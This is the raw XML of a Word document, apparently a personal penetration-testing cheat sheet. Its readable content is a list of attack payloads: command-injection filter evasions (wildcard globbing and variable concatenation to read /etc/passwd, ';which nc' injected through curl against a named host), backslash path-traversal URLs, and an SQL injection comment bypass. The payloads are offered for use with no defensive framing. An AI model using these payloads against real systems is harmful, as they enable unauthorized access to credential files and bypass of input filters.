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16"/>
          <w:szCs w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LFI RFI Bypass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49"/>
        <w:gridCol w:w="5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</w:tcPr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wildcard method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5173" w:type="dxa"/>
          </w:tcPr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Standard: /bin/cat /etc/passwd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Evasion: /???/??t /???/??ss??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9" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center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</w:rPr>
              <w:t>concatenate strings method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</w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5173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21"/>
              </w:rPr>
              <w:t>$curl -s "http://test1.unicresit.it/?zzz=;+which+ls"     $ curl -s "http://test1.unicresit.it/?zzz=;+which+nc"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21"/>
              </w:rPr>
              <w:t>uninitialized variable concatenate methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5173" w:type="dxa"/>
          </w:tcPr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echo "uninitialized_variable=$uninitialized_variable"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$u = $uninitialized_variable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cat$u /etc$u/passwd$u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file.php/?host</w:t>
            </w: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=www.google.com;ls+/</w:t>
            </w:r>
          </w:p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  <w:t>file.php/?host=www.google.com;cat+/etc$u/passwd$u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  <w:t>URL ENCODE backslash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5173" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16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GIVES 404 - https://abc.redact.com/static/\..\..\/</w:t>
            </w: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 xml:space="preserve">GIVES blank page etc. https://abc.redact.com/static/%5c..%5c..%5c/ </w:t>
            </w:r>
          </w:p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bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQL bypass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  <w:t>Comment method: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  <w:t>/?id=1+un/**/ion+sel/**/ect+1,2,3--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 w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="18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18"/>
                <w:szCs w:val="21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18"/>
                <w:szCs w:val="21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bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Python File sharing -&gt; python3 -m http.server 8080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7E7A8A"/>
    <w:rsid w:val="2EFD7A56"/>
    <w:rsid w:val="2FBF699F"/>
    <w:rsid w:val="3DFF340F"/>
    <w:rsid w:val="4A1947CF"/>
    <w:rsid w:val="5BDE0FB3"/>
    <w:rsid w:val="5FFFC1BB"/>
    <w:rsid w:val="7DEFBD4B"/>
    <w:rsid w:val="CB2AC92A"/>
    <w:rsid w:val="E689CE2B"/>
    <w:rsid w:val="E7B596D7"/>
    <w:rsid w:val="F76DD5F8"/>
    <w:rsid w:val="F7FF1851"/>
    <w:rsid w:val="F9F57DCD"/>
    <w:rsid w:val="FEFB2ACD"/>
    <w:rsid w:val="FFFE8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root</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-19T14:37:20Z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